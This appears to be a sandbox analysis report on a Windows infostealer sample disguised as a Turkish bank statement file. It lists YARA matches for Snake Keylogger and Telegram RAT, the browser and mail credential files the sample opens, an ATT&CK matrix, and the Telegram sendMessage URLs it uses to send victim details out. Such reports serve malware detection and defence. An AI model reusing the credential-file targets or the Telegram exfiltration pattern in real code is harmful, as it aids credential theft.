Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7644, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4710756454.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4714892909.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4714585363.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7644, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDYiGmDlq.exe PID: 7644, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hesap_Hareketleri_10122024_html.exe	37%	ReversingLabs
Hesap_Hareketleri_10122024_html.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	37%	ReversingLabs

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:37:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:08:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.175	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034B2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlBcq	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002D6D000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000347C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	UDYiGmDlq.exe, 00000010.00000002.4714892909.0000000003481000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034B2000.00000004.00000800.00020000.00000000.sdmp	false	high
